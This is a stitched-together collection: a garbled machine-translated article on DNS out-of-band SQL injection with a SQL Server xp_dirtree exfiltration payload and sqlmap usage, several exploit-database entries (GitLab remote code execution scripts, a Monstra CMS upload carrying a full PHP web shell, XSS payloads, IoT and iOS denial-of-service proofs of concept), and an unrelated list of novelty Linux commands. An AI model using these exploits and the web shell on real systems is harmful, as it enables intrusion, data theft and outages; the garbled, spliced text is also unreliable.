aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa最大長は128です。UNCパスの最大長は128であることがわかります UNCパスにはスペースなどの特殊文字を含めることはできません。また、含まれている場合、DNS要求は送信されません。 sqlserverの注入を例にとると、SQLMAPで与えられたソリューションを参照してください '; @host varchar（1024）を宣言します。 @host='rmy。'+（トップ1 master.dbo.fn_varbintohexstr（cast（（isnull（name as nvarchar（4000））、 ''））、1,13）のcast（cast（cast（name as nvarchar））from master.sysdatabase not not not in（select not in）from master.sysdatabase by datisabase datsabase datsabase datsabaseの順に選択されます。 name）+'。nrz.rainism.cc'; exec（ 'master.xp_dirtree' \\ '+@host+' \ cckc ''） - ドメイン名にランダムな文字列「RMY」、「NRZ」を追加して、DNSにクエリごとにキャッシュがないことを確認してください Substring（）関数を使用して、毎回特定のビット数のデータを転送します 取得したデータは、master.dbo.fn_varbintohexstr（）ストアドプロシージャを使用して16を禁止しています 0x04 OOBインジェクションにSQLMAPのDNSドメインパラメーターを使用 自動化されたツールなしで、このような便利で高速な噴射方法はどうすればいいですか？ SQLMAPドキュメントを注意深く読んだ学生は、-DNS-Domainのパラメーターを知っている必要があります。これは、SQLMAP統合におけるOOB注入にDNSを使用する方法です 使用方法：SQLMAPが-DNS-Domainパラメーターを使用すると、ポート53を聴きます。DNSを実行してSQLMAPを実行しているホストにデータを取得するためにデータを取得するためにDNSサーバーをDNSから取得してDNSから取得したデータを取得する必要があります。 DNSサーバーも必要であるため、2つのドメイン名が必要であり、詳細な構成は次のとおりです。 dnsポイントを解析するために、sqlmapを実行するホストIPにドメイン名ns1.xxx.com、ns2.xxx.comを構成します。ここでは、 *ワイルドカード文字を使用して、Aレコードを構成します ns1.xxx.comおよびNS2.xxx.com 3として、テイクアウトデータのドメイン名のrainism.cc用ドメイン名サーバーを構成します 外部ネットワークのVPSで次のコマンドを実行しますsqlmap.py -u 'http://xoo.com/index.php?id=1*' - random-agent -dns -domain='rainism.cc' -v 3 TCPDUMPを使用してポート53を聴くと、返されたデータがわかります。 元のリンクアドレス：https://MP.Weixin.QQ.com/s/NCVRK6NEB_LDV7MXDXN3VA

# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS) # Date: 01/06/2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html # Software Link: https://www.chiyu-tech.com/category-hardware.html # Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021 # Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC # CVE: CVE-2021-31642 # Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device. CVE ID: CVE-2021-31642 CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642 Affected parameter: page=Component: if.cgi Payload: if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 ====HTTP request====== GET /if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: close Referer: http://127.0.0.1/AccLog.htm Cookie: fresh= Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to the CGI component (if.cgi) 3. Append the payload at the end of the vulnerable parameter (page) 4. Submit the request and observe payload execution Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.

# Exploit Title: Gitlab 13.9.3 - Remote Code Execution (Authenticated) # Date: 02/06/2021 # Exploit Author: enox # Vendor Homepage: https://about.gitlab.com/ # Software Link: https://gitlab.com/ # Version: < 13.9.4 # Tested On: Ubuntu 20.04 # Environment: Gitlab 13.9.1 CE # Credits: https://hackerone.com/reports/1125425 #!/usr/bin/python3 import requests from bs4 import BeautifulSoup import random import os import argparse parser = argparse.ArgumentParser(description='GitLab < 13.9.4 RCE') parser.add_argument('-u', help='Username', required=True) parser.add_argument('-p', help='Password', required=True) parser.add_argument('-c', help='Command', required=True) parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True) args = parser.parse_args() username = args.u password = args.p gitlab_url = args.t command = args.c session = requests.Session() # Authenticating print("[1] Authenticating") r = session.get(gitlab_url + "/users/sign_in") soup = BeautifulSoup(r.text, features="lxml") token = soup.findAll('meta')[16].get("content") login_form = { "authenticity_token": token, "user[login]": username, "user[password]": password, "user[remember_me]": "0" } r = session.post(f"{gitlab_url}/users/sign_in", data=login_form) if r.status_code != 200: exit(f"Login Failed:{r.text}") else: print("Successfully Authenticated") # Creating Project print("[2] Creating Project") r = session.get(f"{gitlab_url}/projects/new") soup = BeautifulSoup(r.text, features="lxml") project_token = soup.findAll('meta')[16].get("content") project_token = project_token.replace("==", "%3D%3D") project_token = project_token.replace("+", "%2B") project_name = f'project{random.randrange(1, 10000)}' cookies = {'sidebar_collapsed': 'false','event_filter': 'all','hide_auto_devops_implicitly_enabled_banner_1': 'false','_gitlab_session': session.cookies['_gitlab_session'],} payload=f"utf8=%E2%9C%93&authenticity_token={project_token}&project%5Bci_cd_only%5D=false&project%5Bname%5D={project_name}&project%5Bpath%5D={project_name}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=20" r = session.post(gitlab_url+'/projects', data=payload, cookies=cookies, verify=False) if "The change you requested was rejected." in r.text: exit('Exploit failed, check input params') else: print("Successfully created project") # Cloning Wiki and Writing Files print("[3] Pushing files to the project wiki") wiki_url = f'{gitlab_url}/{username}/{project_name}.wiki.git' os.system(f"git clone {wiki_url} /tmp/project") f1 = open("/tmp/project/load1.rmd","w") f1.write('{::options syntax_highlighter="rouge" syntax_highlighter_opts="{formatter: Redis, driver: ../get_process_mem\}" /}\n\n') f1.write('~~~ ruby\n') f1.write(' def what?\n') f1.write(' 42\n') f1.write(' end\n') f1.write('~~~\n') f1.close() f2 = open("/tmp/project/load2.rmd","w") temp='{::options syntax_highlighter="rouge" syntax_highlighter_opts="{a: \'`'+command+'`\', formatter: GetProcessMem\}" /}\n\n' f2.write(temp) f2.write('~~~ ruby\n') f2.write(' def what?\n') f2.write(' 42\n') f2.write(' end\n') f2.write('~~~\n') f2.close() # It will prompt for user and pass. Enter it. os.system('cd /tmp/project && git add -A . && git commit -m "Commit69" && git push') print("Succesfully Pushed") # Cleaning Up os.system('rm -rf /tmp/project') # Triggering RCE print("[4] Triggering RCE") trigger_url=f"{gitlab_url}/{username}/{project_name}/-/wikis/load2" r = session.get(trigger_url, cookies=cookies, verify=False)

# Exploit Title: FUDForum 3.1.0 - 'author' Reflected XSS # Exploit Author: Piyush Patil # Vendor Homepage: http://fudforum.org/ # Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.1.0.zip/download # Version: FUDForum 3.1.0 # Tested on: Windows 10 and Kali # CVE : CVE-2021-27520 -Description: A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "author" parameter. -Payload used: y" onmouseover=alert(2) y=" -Steps to reproduce: 1- goto https://localhost/fudforum/index.php?t=search& 2- In the "Filter by User" search option, paste XSS payload 3- Hover your mouse to "y" and XSS will get triggered

# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (Authenticated) # Date: 03.06.2021 # Exploit Author: Ron Jost (hacker5preme) # Vendor Homepage: https://monstra.org/ # Software Link: https://monstra.org/monstra-3.0.4.zip # Version: 3.0.4 # Tested on: Ubuntu 20.04 # CVE: CVE-2018-6383 # Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-6383-Exploit ''' Description: Monstra CMS through 3.0.4 has an incomplete "forbidden types" list that excludes .php (and similar) file extensions but not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code by uploading a file, a different vulnerability than CVE-2017-18048. ''' ''' Import required modules: ''' import argparse import requests ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Exploit for CVE-2018-6383') my_parser.add_argument('-T', type=str, help='Target IP') my_parser.add_argument('-P', type=str, help='Target Port') my_parser.add_argument("-U", type=str, help="Monstra CMS Path") my_parser.add_argument('-u', type=str, help="Username") my_parser.add_argument('-p', type=str, help='Password') args = my_parser.parse_args() target_ip = args.T target_port = args.P Monstracms_path = args.U username = args.u password = args.p ''' Exploit: ''' # Cookies: session = requests.Session() url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php' cookies = session.get(url).cookies.get_dict() value = cookies['PHPSESSID'] cookies = { "__atuvc": "9%7C22", 'PHPSESSID': 'sga7s1jb0o3b7dlueh5soin8a9' } # Construct authentication header: headers = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://" + target_ip, "Connection": "close", "Referer": "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php', "Upgrade-Insecure-Requests": "1"} # Construct authentication body body = { "login": username, "password": password, "login_submit": "Log In"} x = requests.post(url, headers=headers, cookies=cookies, data=body) # Construct Exploit link: url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php?id=filesmanager' # Construct Exploit header: header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------27822155982314896762160847658", "Origin": "http://" + target_ip, "Connection": "close", "Referer": "http://" + target_ip + Monstracms_path + 'admin/index.php?id=filesmanager', "Upgrade-Insecure-Requests": "1" } # Construct Exploit data: burp0_data = "-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"csrf\"\r\n\r\n1e71963993909d612c40962b401c556b70e9bb3c\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.phar\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"upload_file\"\r\n\r\nUpload\r\n-----------------------------27822155982314896762160847658--\r\n" # Exploit: x = requests.post(url, headers=header, cookies=cookies, data=burp0_data) # Finish: print('') print('Please login in your webrowser and then open the following URL:') print('File uploaded to: http://' + target_ip + ':' + target_port + Monstracms_path + 'public/uplaods/shell.phar') print('')

# Exploit Title: Color Notes 1.4 - Denial of Service (PoC) # Date: 06-04-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/gt/app/color-notes/id830515136 # Version: 1.4 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")

# Exploit Title: Gitlab 13.10.2 - Remote Code Execution (Authenticated) # Date: 04/06/2021 # Exploit Author: enox # Vendor Homepage: https://about.gitlab.com/ # Software Link: https://gitlab.com/ # Version: < 13.10.3 # Tested On: Ubuntu 20.04 # Environment: Gitlab 13.10.2 CE # Credits: https://hackerone.com/reports/1154542 import requests from bs4 import BeautifulSoup import random import os import argparse parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE') parser.add_argument('-u', help='Username', required=True) parser.add_argument('-p', help='Password', required=True) parser.add_argument('-c', help='Command', required=True) parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True) args = parser.parse_args() username = args.u password = args.p gitlab_url = args.t command = args.c session = requests.Session() # Authenticating print("[1] Authenticating") r = session.get(gitlab_url + "/users/sign_in") soup = BeautifulSoup(r.text, features="lxml") token = soup.findAll('meta')[16].get("content") login_form = { "authenticity_token": token, "user[login]": username, "user[password]": password, "user[remember_me]": "0" } r = session.post(f"{gitlab_url}/users/sign_in", data=login_form) if r.status_code != 200: exit(f"Login Failed:{r.text}") else: print("Successfully Authenticated") # payload creation print("[2] Creating Payload ") payload = f"\" . qx{{{command}}} . \\\n" f1 = open("/tmp/exploit","w") f1.write('(metadata\n') f1.write(' (Copyright "\\\n') f1.write(payload) f1.write('" b ") )') f1.close() # Checking if djvumake is installed check = os.popen('which djvumake').read() if (check == ""): exit("djvumake not installed. Install by running command : sudo apt install djvulibre-bin") # Building the payload os.system('djvumake /tmp/exploit.jpg INFO=0,0 BGjp=/dev/null ANTa=/tmp/exploit') # Uploading it print("[3] Creating Snippet and Uploading") # Getting the CSRF token r = session.get(gitlab_url + "/users/sign_in") soup = BeautifulSoup(r.text, features="lxml") csrf = soup.findAll('meta')[16].get("content") cookies = {'_gitlab_session': session.cookies['_gitlab_session']} headers = { 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);', 'Accept': 'application/json', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': f'{gitlab_url}/projects', 'Connection': 'close', 'Upgrade-Insecure-Requests': '1', 'X-Requested-With': 'XMLHttpRequest', 'X-CSRF-Token': f'{csrf}' } files = {'file': ('exploit.jpg', open('/tmp/exploit.jpg', 'rb'), 'image/jpeg', {'Expires': '0'})} r = session.post(gitlab_url+'/uploads/user', files=files, cookies=cookies, headers=headers, verify=False) if r.text != "Failed to process image\n": exit("[-] Exploit failed") else: print("[+] RCE Triggered !!")

# Exploit Title: 4Images 1.8 - 'redirect' Reflected XSS # Exploit Author: Piyush Patil # Vendor Homepage: https://www.4homepages.de/ # Software Link: https://www.4homepages.de/?download=4images1.8.zip&code=81da0c7b5208e172ea83d879634f51d6 # Version: 4Images Gallery 1.8 # Tested on: Windows 10 and Kali # CVE : CVE-2021-27308 -Description: A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter. -Steps to reproduce: 1- Goto 4images admin panel page (demo instance: https://localhost/4images/admin/index.php) 2- Enter the credentials , Turn on the intercept and click on "Login" 3- copy paste the XSS payload after redirect=./../admin/index.php%3Fsessionid=xxxxxPASTEPAYLOADHERE 4-Forward the request and you can see XSS is triggered.

In our opinion, Linux is the entire command line. There are many commands to implement a certain function. This is precisely this that it also gives a certain threshold for learning Linux. But do you know? There are also many interesting commands in Linux, and of course all Linux distributions can install and run these commands! Let’s play together! sl command You will see a train driving from the right side of the screen to the left. Install sudo apt-get install sl run sl The command has several options: -alFe. -a An accident seems to happen. You’ll feel goal for people who cry for help. -l shows little one. -F It flies. -e Allow interrupt by Ctrl+C. You can give someone a prank. If he hits ls, what he doesn't know will definitely be effective. alias ls=sl fortune command Output a sentence, there are jokes, famous quotes, etc. (There are also Tang poetry and Song lyrics sudo apt-get install fortune-zh) Install sudo apt-get install fortune fortune cowsay command Use ASCII characters to print cows, sheep and other animals, and there is also a cowthink. This is the cow and that is the cow saying, haha, it is almost the same Install sudo apt-get install cowsay run cowsay 'Big Cousin, awesome 666' cowsay -l Check the names of other animals, and then -f keep up with the names of animals, such as cowsay -f tux 'Take it' You can also let cowsay say the content of fortune, like this: fortune | cowsay cmatrix command This is cool!《黑客帝国》 The matrix-style animation effect Install sudo apt-get install cmatrix run cmatrix figlet, toilet command Word Art Generator, composed of ASCII characters, displays the text as a title bar. There is also the banner command Install sudo apt-get install figlet sudo apt-get install toilet run figlet bbskali.cn ! Toilet bbskali.cntoilet can also add colors. Please use the options in it yourself. toilet -f mono12 -F bbskali.cn oneko command A cat star appears on the desktop, following your mouse, and it will sleep if you don’t move. Haha, this is pretty good Install $ sudo apt-get install oneko runs oneko and want to turn off this guy, press ctrl+c to end xeyes command A pair of eyes appear on the screen, staring at your mouse pointer Installation and operation as above yes command Output endless characters, press ctrl+c to end, such as yes I'm very NB cal 9 1752 cal is printing a calendar, but this is a very weird month. shred Overwriting messy files means shattering the documents. Haha, if you want to destroy the blockbuster seeds and movies you have hidden privately, you will rely on it.